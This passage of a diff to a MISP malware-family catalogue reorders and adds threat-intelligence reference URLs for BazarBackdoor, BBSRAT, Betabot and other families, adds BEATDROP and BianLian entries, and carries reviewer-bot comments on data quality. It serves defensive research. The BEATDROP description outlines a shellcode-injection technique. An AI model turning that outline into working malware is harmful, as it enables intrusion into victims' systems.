- "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
- "https://intel471.com/blog/conti-leaks-ransomware-development",
- "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
- "https://experience.mandiant.com/trending-evil/p/1",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor",
- "https://twitter.com/anthomsec/status/1321865315513520128",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://twitter.com/Unit42_Intel/status/1458113934024757256",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
- "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf",
- "https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/",
- "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors",
- "https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/",
- "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
- "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
- "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
- "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration",
- "https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/",
- "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/",
- "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/",
+ "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
- "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
- "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/",
- "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://malwarebookreports.com/bazarloader-back-from-holiday-break/",
- "https://forensicitguy.github.io/bazariso-analysis-advpack/",
- "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
- "https://unit42.paloaltonetworks.com/bazarloader-malware/",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://www.youtube.com/watch?v=uAkeXCYcl4Y",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
"https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://thedfirreport.com/2020/10/08/ryuks-return/",
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
+ "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
"https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/",
+ "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/",
+ "https://www.scythe.io/library/threatthursday-ryuk",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
+ "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
+ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://abnormalsecurity.com/blog/bazarloader-contact-form",
+ "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
"https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9",
+ "https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
"https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
- "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/"
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://twitter.com/Unit42_Intel/status/1458113934024757256",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://unit42.paloaltonetworks.com/bazarloader-malware/",
+ "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
+ "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.youtube.com/watch?v=pIXl79IPkLI",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors",
+ "https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/",
+ "https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/",
+ "https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/",
+ "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
+ "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
+ "https://www.youtube.com/watch?v=uAkeXCYcl4Y",
+ "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/",
+ "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://intel471.com/blog/conti-leaks-ransomware-development",
+ "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/",
+ "https://johannesbader.ch/blog/yet-another-bazarloader-dga/",
+ "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II",
+ "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
+ "https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
+ "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/",
+ "https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/",
+ "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/",
+ "https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/",
+ "https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
+ "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
+ "https://fr3d.hk/blog/campo-loader-simple-but-effective",
+ "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://forensicitguy.github.io/bazariso-analysis-advpack/",
+ "https://malwarebookreports.com/bazarloader-back-from-holiday-break/",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d",
+ "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
+ "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day",
+ "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/"
],
"synonyms": [
"BEERBOT",
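Review bot: the new BATLOADER entry lands with an empty `description`, and the rebuilt BazarBackdoor `refs` list still carries near-duplicate URLs that differ only by a trailing slash or path prefix (both `blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti` and `.../conti/`, both `microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-...-protect-yourself` and `.../protect-yourself/`, and the bazacall post under `microsoft.com/security/...` and `microsoft.com/en-us/security/...`). Suggest normalizing URLs (strip trailing slash, drop `/en-us`) before dedup in the generator. The wholesale reorder of well over a hundred refs also hides the genuine additions in this hunk (for example the trellix `evolution-of-bazarcall-social-engineering-tactics` post, `unit42.paloaltonetworks.com/luna-moth-callback-phishing/` and the two `cocomelonc.github.io` tutorials); a sorted list would reduce the delta to those lines.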
@@ -14043,13 +14919,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
"https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176",
- "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
- "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
"https://twitter.com/James_inthe_box/status/1357009652857196546",
- "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811"
+ "https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176",
+ "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware"
],
"synonyms": [
"NimzaLoader"
@@ -14064,10 +14940,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat",
- "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
- "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae",
"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/",
- "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb"
+ "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
+ "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae"
],
"synonyms": [],
"type": []
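Review bot: the added `https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html` under win.bbsrat looks, from its URL, like a generic malware-persistence tutorial rather than a BBSRAT write-up; if it is pulled through automatically from Malpedia's reference list that is acceptable, but it is worth confirming it is family-specific before it is surfaced as a BBSRAT reference in MISP. The other three lines are a reorder of refs that were already present.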
@@ -14102,24 +14979,35 @@
"value": "Beapy"
},
{
- "description": "",
+ "description": "According to Mandiant, BEATDROP is a downloader written in C that uses Atlassian's project management service Trello for C&C. BEATDROP uses Trello to store victim information and retrieve AES-encrypted shellcode payloads to be executed. BEATDROP then injects and executes downloaded payloads into a suspended process. Upon execution, BEATDROP maps a copy of ntdll.dll into memory to execute shellcode in its own process. The sample then creates a suspended thread with RtlCreateUserThread the thread points to NtCreateFile. The sample changes execution to shellcode and resumes the thread. The shellcode payload is retrieved from Trello and is targeted per victim. Once the payload has been retrieved, it is deleted from Trello.",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep",
- "https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d2fd10ba-5904-4679-8758-509b72b1aa2c",
+ "value": "BEATDROP"
+ },
+ {
+ "description": "Bedep has been mostly observed in ad-fraud campaigns, although it can also generally load modules for different tasks. It was dropped by the Angler Exploit Kit.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep",
+ "https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html",
+ "https://blog.talosintelligence.com/bedep-actor/",
+ "http://malware-traffic-analysis.net/2016/05/09/index.html",
+ "https://web.archive.org/web/20150524032716/http://asert.arbornetworks.com/bedeps-dga-trading-foreign-exchange-for-malware-domains/",
+ "https://malware.dontneedcoffee.com/2016/04/bedepantiVM.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "066f8ad3-0c99-43eb-990c-8fae2c232f62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b",
"value": "Bedep"
},
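Review bot: this hunk silently drops Bedep's existing `related` block (the `similar` link to dest-uuid `066f8ad3-0c99-43eb-990c-8fae2c232f62` with the `estimative-language:likelihood-probability="almost-certain"` tag); that removal is not something an upstream refs refresh would produce, so either the commit should state that the relationship was intentionally retired or the generator is discarding hand-curated fields on regeneration and needs to preserve them. The diff alignment makes it look as if Bedep was rewritten into BEATDROP, but reading the `+` lines the new BEATDROP entry (uuid `d2fd10ba-5904-4679-8758-509b72b1aa2c`) and the Bedep entry with its new description and four added refs are both intact.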
@@ -14220,18 +15108,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
"http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html",
- "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
"https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39",
- "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
"https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
+ "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en",
"http://www.xylibox.com/2015/04/betabot-retrospective.html",
- "https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/"
+ "https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt",
+ "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
+ "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39"
],
"synonyms": [
"Neurevt"
@@ -14271,9 +15159,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt",
- "https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger",
+ "https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/",
"https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf",
- "https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/"
+ "https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger"
],
"synonyms": [],
"type": []
@@ -14281,13 +15169,30 @@
"uuid": "ae3fe9fa-0717-413e-94fe-6e7b607e45c6",
"value": "BHunt"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian",
+ "https://twitter.com/malwrhunterteam/status/1558548947584548865",
+ "https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/",
+ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
+ "https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fcc016ad-41a0-4bda-ad88-9542b5f560d9",
+ "value": "BianLian (Windows)"
+ },
{
"description": "Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows sytem processes and kills shadow copies.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware",
- "http://zirconic.net/2018/07/bi_d-ransomware/",
- "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/"
+ "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/",
+ "http://zirconic.net/2018/07/bi_d-ransomware/"
],
"synonyms": [],
"type": []
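Review bot: the new `BianLian (Windows)` entry has an empty `description` although the linked Cyble and BlackBerry posts would supply a one-liner; the `(Windows)` suffix in `value` also implies a sibling entry for another platform, so check that the two are linked via `related` or synonyms rather than left as unconnected clusters. The unchanged BI_D context line still reads "sytem" for "system" and "Kills all processes ... and kills shadow copies" could be tightened; since this file is generated, fix the wording at the source rather than by hand in the JSON.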
@@ -14314,13 +15219,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates",
- "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
+ "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf",
"https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server",
- "https://habrahabr.ru/post/213973/",
- "https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
"https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html",
- "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf"
+ "https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
+ "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/",
+ "https://habrahabr.ru/post/213973/",
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/"
],
"synonyms": [],
"type": []
@@ -14348,9 +15253,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata",
"https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
"https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
- "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/"
+ "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/"
],
"synonyms": [],
"type": []
@@ -14376,8 +15281,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.biopass",
